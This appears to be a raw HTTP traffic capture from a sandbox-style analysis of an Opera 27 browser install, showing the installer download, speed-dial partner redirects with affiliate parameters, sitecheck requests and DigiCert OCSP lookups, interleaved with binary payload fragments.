ond1.0...U....Microsoft Corporation1.0...U....Microsoft IT1.0...U....M
icrosoft IT SSL SHA20...141229205745Z..150314205745Z0!1.0...U....Shoul
d be ignore by CA0.."0...*.H.............0...........&!(..$.K...."=f..
..x.d.._s.....j....9`..l.Z..............^f..u......-e.&.bG.(i.Q.......
....bEy...^7A...A..c....CF-&...e.7..7F....."..w...y.:..`.w{~..D.x*....
...x3Os......q...... S.fB .ig.....L..3......4E..}..7...M....e ...6.M.O
.....<5:......r.....]..A.5........0..0...U..........<.|7...@N6p.
I.e|0...U.#..0...Q.$&..h"W.& ;Fb.{...0...U...........0...U.%..0... ...
....0... .....7....0.0... .......0... .....0......0...*.H.............
.....sa....^`.U.h.....(c[..j.|. ..#....3.5.?..L.....Z....J......*.w...
w.$.z..Y.d.....l.....G#.....o.\t.......(.B =..P..T....0./P.....z.3....
L.O3....z...Wxo..~.OeH....c.i.@."..?d.......=v(.....m..LN..PP....<.
}T.X......K.&e.S...|....% ...(F.=k..~.j..C......4.....c...._p..9.#<<< skipped >>>

GET /?host=redir.opera.com&hdn=H0WKpMbVXsif0I8OJoRVZA== HTTP/1.1

Host: sitecheck2.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache

Cache-Control: max-age=7200

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/xml

Content-Length: 163

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:31:31 GMT

X-Varnish: 2782410074 2780439122

Age: 496

Via: 1.1 varnish

Connection: keep-alive

X-Served-By: n16-05-07

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 21628

..........M....0.D............'x#......d[D....z.......q..H....:W"C.B..
{!.t..Di..&$.h.....#...,.&,DDK.#.S..9.@.b2.....Z..mO.Z..06....L:4..R Y
.]......N|...y.>.......HTTP/1.1 200 OK..Server: Apache..Cache-Contr
ol: max-age=7200..Vary: Accept-Encoding..Content-Encoding: gzip..Conte
nt-Type: text/xml..Content-Length: 163..Accept-Ranges: bytes..Date: Mo
n, 23 Feb 2015 09:31:31 GMT..X-Varnish: 2782410074 2780439122..Age: 49
6..Via: 1.1 varnish..Connection: keep-alive..X-Served-By: n16-05-07..X
-Varnish-Cache: HIT..X-Varnish-Cache-Hits: 21628............M....0.D..
..........'x#......d[D....z.......q..H....:W"C.B..{!.t..Di..&$.h.....#
...,.&,DDK.#.S..9.@.b2.....Z..mO.Z..06....L:4..R Y.]......N|...y.>.
..........

GET /speeddials/partner/yandex_maps_ua_uk HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/yandex_maps_ua/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644829

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /speeddials/partner/slando HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/slando/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644859

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/booking_com_ua/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "409472-11cb-50ecea1134600"

Content-Type: image/png

Content-Length: 4555

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644876 2724619479

Age: 72

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 11
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:42B4
BA3FBED611E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:42B4BA3EBED611
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8C7021171320681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>.wc.....IDATx....TTW.....Xc...dw..l.lK....%
.U..]..%.u..A.......UQ..XQ.....R..%....O......SWa.?.w<.7......}...o
|..G..q ..[@.,!T..*K.,!T..*K.,!T..*K.,!T..*K.,!T..*K.,!T..*K.,!T..*K.,
!T..*K.,!T..*K.,..Be....PYBe....PYBe....PYBe....PYBe....PYBe....PYBe..
..PYBe....PYBe....PYBe....PYB.,...PYB.,...PYB.,....?k..Aw.......v....`
..E".|.>w.......... .....J....o1....6.0c..;w.>x..Pn.?.L.1..l?.9.
n.y`.v..E...?l.^.^ja.E..v./.2..=....-.1..lN....nG......R.,n.Z../\.Wz-.
..P.g.....WU.....l.~!v.D.l.. B.I.I...Qv......A....sNK...\.p.....KW<<< skipped >>>

GET /pub/opera/desktop/27.0.1689.69/win/Opera_27.0.1689.69_Setup.exe HTTP/1.1

User-Agent: Opera NetInstaller/27.0.1689.69

Connection: Keep-Alive

Cache-Control: no-cache

Host: operasoftware.pc.cdn.bitgravity.com


HTTP/1.1 200 OK

Content-Type: application/x-msdos-program

Last-Modified: Tue, 10 Feb 2015 14:35:53 GMT

Content-Length: 32900504

Date: Mon, 23 Feb 2015 09:31:21 GMT

Age: 258059

Connection: keep-alive

Server: v/1.4.5/1.4.2/v5fra1-www

Accept-Ranges: bytes

MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.........a.;...;...
;.......>...6.......6.......6...w.......9.......?.......:...}...<
;...;...............F..."...F.......F.......6...:...;...9...F...:...Ri
ch;...........PE..L...%S.T.........."...............................@.
.................................m....@...............................
......h....p...$.......... ...x........g..............................
........@............... ...<...`....................text...(......
..................... ..`.rdata..............................@..@.data
....l......."..................@....tls.........P.....................
.@..._RDATA.......`......................@..@.rsrc....$...p...&.......
...........@..@.reloc...g.......h..................@..B...............
......................................................................
......................................................................
.....................................................h..K......Y.h..K.
.....Y.h..K......Y................N..6...h..K..k...Y...........h..K..U
...Y.....hP.K..E...Y.....h..K..5...Y.....h..K..%...Y.....h@.K......Y..
...h..K......Y.....h..K......Y.....h`.K......Y.....h..K......Y......x.
N......h0.K......Y............`.N......h@.K......Y..............N.....
.hP.K..{...Y...............M....M.....|.=....s.....N.........N........
.N.....N............N......h`.K......Y..............N......hp.K......Y
.............@......N..........O.....N.....j....N..tJ..h..K......Y

<<< skipped >>>

GET /favicon.ico HTTP/1.1

Host: VVV.google.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Vary: Accept-Encoding

Content-Type: image/x-icon

Last-Modified: Tue, 14 Aug 2012 15:19:23 GMT

Date: Thu, 19 Feb 2015 00:39:57 GMT

Expires: Fri, 27 Feb 2015 00:39:57 GMT

X-Content-Type-Options: nosniff

Content-Encoding: gzip

Server: sffe

Content-Length: 982

X-XSS-Protection: 1; mode=block

Age: 377493

Alternate-Protocol: 80:quic,p=0.08

Cache-Control: public, max-age=691200
...........X.KTQ..E..2.......,C.......B;Q.D....i.P..d........K..h{...9
........qt.y.<g...w....=..m.f........`..`.5..DD......kQ.f#...N..W..
. G..8.Qd...9eG.!k.<\..V...A...u....&..........@ ..................
.N......u.!......b.CP.t .F..2..Nrw..;.e...O@l..bk.h.IP'~.9...or.h.4(?z
...# Y..Q..3.@..*1 Y..6.,._z......g...3-...@..q.........sv....T.G0-/..
..s........r. .6@..^.;R..C.. .............]..T.....9f..<c..g.G"W ..
..Y.;."..Q.S!...SN..0`.L....?cv/......4_k.q....z...........7.r=.......
.h..P.b.}...2.~k....=..;`.6...@.u`U...ny...T.[7.7........d.P...O.../..
...|.c....f}...P.............Y....n.g).....N. ....w.P...W....K.U...}..
.Bu..IJ....i..q6..&.T.......{co....M4N,.vqR...`.&..2.F./O.@l..... ....
".B...a.^.....$........JB......}..c.A.=D{8=6.}.e........._|.....=:L."y
.l....7..._c..77.LAm.....k9...........^......g.`M`=f8..4?.}.9a....|.1.
4..V..uX.m...k..>..'}.B.....s.............y50-..#.;o.:.`=>2{}...
...|.9.....\......`..Q}.B..\.qZ...O...FTG.s.\...........?..x.#t.....`2
W...a".....9.6...HTTP/1.1 200 OK..Vary: Accept-Encoding..Content-Type:
 image/x-icon..Last-Modified: Tue, 14 Aug 2012 15:19:23 GMT..Date: Thu
, 19 Feb 2015 00:39:57 GMT..Expires: Fri, 27 Feb 2015 00:39:57 GMT..X-
Content-Type-Options: nosniff..Content-Encoding: gzip..Server: sffe..C
ontent-Length: 982..X-XSS-Protection: 1; mode=block..Age: 377493..Alte
rnate-Protocol: 80:quic,p=0.08..Cache-Control: public, max-age=691200.
............X.KTQ..E..2.......,C.......B;Q.D....i.P..d........K..h{...
9........qt.y.<g...w....=..m.f........`..`.5..DD......kQ.f#...N<<< skipped >>>

GET /speeddials/partner/facebook HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/facebook_other/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601642

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /speeddials/partner/product HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/product/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2724563537

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/yahoo_other/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "78725f-2bd0-50ecea1134600"

Content-Type: image/png

Content-Length: 11216

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2724563562 2724522033

Age: 123

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 99
.PNG........IHDR.............6.......gAMA....7.......tEXtSoftware.Adob
e ImageReadyq.e<.. bIDATx..}.t\.y...O...(....N..M,b.([..Hrl.u.$'q.:
..ll..I.]..S|R.W..b;.-..(..EI.%6Q... H...L.....}C@ ..(.[......`..}.~..
.....{V.-CA...,...JY..JY..JY.JY..JY..JY.JY..JY..JY.JY..JY..JY.JY..JY..
JY.JY..JY..JY.JY..JY..JY.JY..JY..JY.JY..JY..JY.JY..JY..JY..JY.JY..JY..
JY.JY..JY..JY.JY..JY..JY.JY..JY..JY.JY..JY..JY.JY..JY..JY.JY..JY..JY.J
Y..JY..JY.JY..JY..JY..)S.3.s. ......2...((.....$..8..mt.^8....p..=...X
.c......<.. p/.......N.1...?z0.....b|~.K...c.L..b................Y.
bJ.._....q.....d....?}.L.;%.A...iB.....TR.]..\..=....a.z.....).c&.....
.......dQ.<........L..f$.0...s_..{j...L=...B...p..?#Q....q....8.0.e
....5...3.u....g...T.j.Y\.....W.....Z?{..S......9e...f.>reI]..{....
..y.......^kz......,\3.........%L.....$..........as...z.'.q.W..Cg..c..
........y"WP...z.JBE....@^./;.....j4...&........DR:.!.E.x...o.....Z..i
a.G.N.......u.t.......Y.J^z......"O*..$) ..|aSC..PL..<...@....O.-(.
....*.1..<..........v]...._......D..?.7..?.$.l.............2HW`..1o
.v.. .3.K.\Egha.a........*....]]RZ.'m.7.....n#]....Z...;..|)2...0.....
*rhau..80..&W.......7.Z6..3....O...?..N...p..bm.....x..g:=...Fh....{..
.[...z $.z....A.D}.....1...' p.2..k..#..Ea9.6R.....P.,@.%c.......^a(.[
..m...,OJ.4..Po. ...!(s.K.....|.. ..dW)1........zb.C..fc7.Kx...:..i.Aq
.....W,[S....l....b..r.9......T......x.y........_..vS......jmwG../5.y.
../-3x...e.?(a.....V`...z.s.~.=...w.w...y...tJ.$...../[...q.=.........
... .....E.d..=...M6..D.....'.u7..DL/.......o.....2. ..{.n..%....(<<< skipped >>>

GET /speeddials/partner/yandex_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://VVV.yandex.ua/?clid=9403

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

X-Pad: avoid browser bug

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:31 GMT

X-Varnish: 2724644643

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://VVV.yandex.ua/?clid=9403..Vary: Accept-Encodi
ng..Content-Encoding: gzip..Content-Type: text/plain..X-Pad: avoid bro
wser bug..Content-Length: 26..Date: Mon, 23 Feb 2015 09:35:31 GMT..X-V
arnish: 2724644643..Age: 0..Via: 1.1 varnish..Connection: keep-alive..
X-Varnish-Cache: MISS................................

GET /speeddials/partner/yandex_mail_ua_uk HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://mail.yandex.ua/?from=dist_svz

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:34 GMT

X-Varnish: 2724645485

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://mail.yandex.ua/?from=dist_svz..Vary: Accept-E
ncoding..Content-Encoding: gzip..Content-Type: text/plain..Content-Len
gth: 26..Date: Mon, 23 Feb 2015 09:35:34 GMT..X-Varnish: 2724645485..A
ge: 0..Via: 1.1 varnish..Connection: keep-alive..X-Varnish-Cache: MISS
................................

GET /speeddials/partner/yandex_maps_ua_uk HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://maps.yandex.ua/?from=dist_svz

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:37 GMT

X-Varnish: 2724646827

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://maps.yandex.ua/?from=dist_svz..Vary: Accept-E
ncoding..Content-Encoding: gzip..Content-Type: text/plain..Content-Len
gth: 26..Date: Mon, 23 Feb 2015 09:35:37 GMT..X-Varnish: 2724646827..A
ge: 0..Via: 1.1 varnish..Connection: keep-alive..X-Varnish-Cache: MISS
................................

GET /speeddials/partner/aukro_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://aukro.ua/?ap=1&aid=24290099&utm_source=operabrowser&utm_medium=advert&utm_campaign=speed_dial

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:38 GMT

X-Varnish: 2598685134

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://aukro.ua/?ap=1&aid=24290099&utm_source=operab
rowser&utm_medium=advert&utm_campaign=speed_dial..Vary: Accept-Encodin
g..Content-Encoding: gzip..Content-Type: text/plain..Content-Length: 2
6..Date: Mon, 23 Feb 2015 09:35:38 GMT..X-Varnish: 2598685134..Age: 0.
.Via: 1.1 varnish..Connection: keep-alive..X-Varnish-Cache: MISS......
..........................

GET /speeddials/partner/booking_com_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://VVV.booking.com/index.html?aid=343341&label=operasoft-sdO15-343341-&utm_source=Opera&utm_medium=web&utm_campaign=sdO15

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:39 GMT

X-Varnish: 2724647261

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://VVV.booking.com/index.html?aid=343341&label=o
perasoft-sdO15-343341-&utm_source=Opera&utm_medium=web&utm_campaign=sd
O15..Vary: Accept-Encoding..Content-Encoding: gzip..Content-Type: text
/plain..Content-Length: 26..Date: Mon, 23 Feb 2015 09:35:39 GMT..X-Var
nish: 2724647261..Age: 0..Via: 1.1 varnish..Connection: keep-alive..X-
Varnish-Cache: MISS................................

GET /speeddials/partner/megogo_net_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://megogo.net/ru?utm_source=operadesktop&utm_medium=operaspeeddial&utm_campaign=operaspeeddial

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:40 GMT

X-Varnish: 2724647878

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://megogo.net/ru?utm_source=operadesktop&utm_med
ium=operaspeeddial&utm_campaign=operaspeeddial..Vary: Accept-Encoding.
.Content-Encoding: gzip..Content-Type: text/plain..Content-Length: 26.
.Date: Mon, 23 Feb 2015 09:35:40 GMT..X-Varnish: 2724647878..Age: 0..V
ia: 1.1 varnish..Connection: keep-alive..X-Varnish-Cache: MISS........
........................

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh/sBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAaeHbd/zx37qXr15cmiQDc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.digicert.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=514042

Content-Type: application/ocsp-response

Date: Mon, 23 Feb 2015 09:31:32 GMT

Etag: "54ead4cd-1d7"

Expires: Sun, 01 Mar 2015 21:31:32 GMT

Last-Modified: Mon, 23 Feb 2015 07:20:45 GMT

Server: ECS (ams/49E4)

X-Cache: HIT

Content-Length: 471

0..........0..... .....0......0...0........P5V.L.f........=.U..2015022
2200000Z0s0q0I0... .........Q..2...}Q......b.U.....P5V.L.f........=.U.
..........z....@7....20150222200000Z....20150301200000Z0...*.H........
.....c..FO.X&.`t.S....95...)6)..m..g@....k...j.U2..-.4.....4 K...,.QN.
j.../D7C.A.r.....8...me..`......0....w..#..~.".F......2....sU....|J.-,
......,. 7.|....FW...i.*.zj8 -..R.<DL....9{...B.31....[."./.=..E...
...B,.....~.aE&.EL...r.hQR.$....$..D.......9.HK...V.7.....

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQgppSLAb7oJaQ6RVV2Zh9VwZIGMwQUkHHbN+tzyO/c1R4StjS6K1qgppICEAt9kXTqajTaLH9Ahr8T1UU= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.digicert.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=512554

Content-Type: application/ocsp-response

Date: Mon, 23 Feb 2015 09:31:32 GMT

Etag: "54ead975-1d7"

Expires: Sun, 01 Mar 2015 21:31:32 GMT

Last-Modified: Mon, 23 Feb 2015 07:40:37 GMT

Server: ECS (ams/D1A1)

X-Cache: HIT

Content-Length: 471

0..........0..... .....0......0...0.......q.7.s.......4. Z.....2015022
3072600Z0s0q0I0... ........ ......%.:EUvf.U...3...q.7.s.......4. Z....
..}.t.j4.,.@....E....20150223072600Z....20150302074100Z0...*.H........
.....x.3.R..Z.....K4.Xt...i/2.9.Ct...je....#.....w....Z.W....dRn......
..d.%q...[. ..{......V......E..TYq.!.h..n:n2$......2W-pq..!..V.L..ly.L
LI......Q.g.Wn3..V....'..Z.N.....9..3.......B5k..@o.\6.7..|.KC..G...65
.p.ZX..C..VY%W9".E,t.?..:......9...R'.....Fxn=.:...HTTP/1.1 200 OK..Ac
cept-Ranges: bytes..Cache-Control: max-age=512554..Content-Type: appli
cation/ocsp-response..Date: Mon, 23 Feb 2015 09:31:32 GMT..Etag: "54ea
d975-1d7"..Expires: Sun, 01 Mar 2015 21:31:32 GMT..Last-Modified: Mon,
 23 Feb 2015 07:40:37 GMT..Server: ECS (ams/D1A1)..X-Cache: HIT..Conte
nt-Length: 471..0..........0..... .....0......0...0.......q.7.s.......
4. Z.....20150223072600Z0s0q0I0... ........ ......%.:EUvf.U...3...q.7.
s.......4. Z......}.t.j4.,.@....E....20150223072600Z....20150302074100
Z0...*.H.............x.3.R..Z.....K4.Xt...i/2.9.Ct...je....#.....w....
Z.W....dRn........d.%q...[. ..{......V......E..TYq.!.h..n:n2$......2W-
pq..!..V.L..ly.LLI......Q.g.Wn3..V....'..Z.N.....9..3.......B5k..@o.\6
.7..|.KC..G...65.p.ZX..C..VY%W9".E,t.?..:......9...R'.....Fxn=.:...ont>....

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEApfEU0DWxeRF9Lv1AOMPzs= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.digicert.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=517686

Content-Type: application/ocsp-response

Date: Mon, 23 Feb 2015 09:31:38 GMT

Etag: "54ead87d-1d7"

Expires: Sun, 01 Mar 2015 21:31:38 GMT

Last-Modified: Mon, 23 Feb 2015 07:36:29 GMT

Server: ECS (ams/D1DC)

X-Cache: HIT

Content-Length: 471

0..........0..... .....0......0...0.......>.i...G...&....cd ...2015
0222200000Z0s0q0I0... ............(..A...B..G@B.X....>.i...G...&...
.cd ...._.M.[........?;....20150222200000Z....20150301200000Z0...*.H..
.............M.h6......`$5...........!............$......Ig......Tu.=)
.y..........X...X8. ..9.. .........s.v.h...yze....BU...6.[.u..!k..f.L.
....S.R...B.7.0..W.h.l..7...6..{.Z...*V......!,?.\..Z0q...g......YX.l.
..... ..|$...P.^..j....../.P.%|.~.pR&.#.1..".NM_......3......

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTtSK3dy3sA4g6EKqm0CfGsMDTPlgQUUOpzidsp+xCPnuUBINTeeZlIg/cCEAFxUrzHYO3GFd2OT1fIbA8= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.digicert.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=512170

Content-Type: application/ocsp-response

Date: Mon, 23 Feb 2015 09:31:38 GMT

Etag: "54ead017-1d7"

Expires: Sun, 01 Mar 2015 21:31:38 GMT

Last-Modified: Mon, 23 Feb 2015 07:00:39 GMT

Server: ECS (ams/D1AF)

X-Cache: HIT

Content-Length: 471

0..........0..... .....0......0...0......P.s..)...... ..y.H....2015022
3064600Z0s0q0I0... .........H...{....*.....04....P.s..)...... ..y.H...
..qR..`.....OW.l.....20150223064600Z....20150302070100Z0...*.H........
.....s.$..c......MCo...j..B.`:.G..8..1...............).P.......*......
R...@...Se.. .....@..". ..3iTEA.......G...{8..NxM....K..\.L...pH.yX.L.
....<.E.....ul..e........#..8...].K.g3.....O..)..L..%...H....hx.G..
%.>.1..V.x=NfJO...0...v....-.Y.....mv. .Z..BL.8.S:...OHTTP/1.1 200 
OK..Accept-Ranges: bytes..Cache-Control: max-age=512170..Content-Type:
 application/ocsp-response..Date: Mon, 23 Feb 2015 09:31:38 GMT..Etag:
 "54ead017-1d7"..Expires: Sun, 01 Mar 2015 21:31:38 GMT..Last-Modified
: Mon, 23 Feb 2015 07:00:39 GMT..Server: ECS (ams/D1AF)..X-Cache: HIT.
.Content-Length: 471..0..........0..... .....0......0...0......P.s..).
..... ..y.H....20150223064600Z0s0q0I0... .........H...{....*.....04...
.P.s..)...... ..y.H.....qR..`.....OW.l.....20150223064600Z....20150302
070100Z0...*.H.............s.$..c......MCo...j..B.`:.G..8..1..........
.....).P.......*......R...@...Se.. .....@..". ..3iTEA.......G...{8..Nx
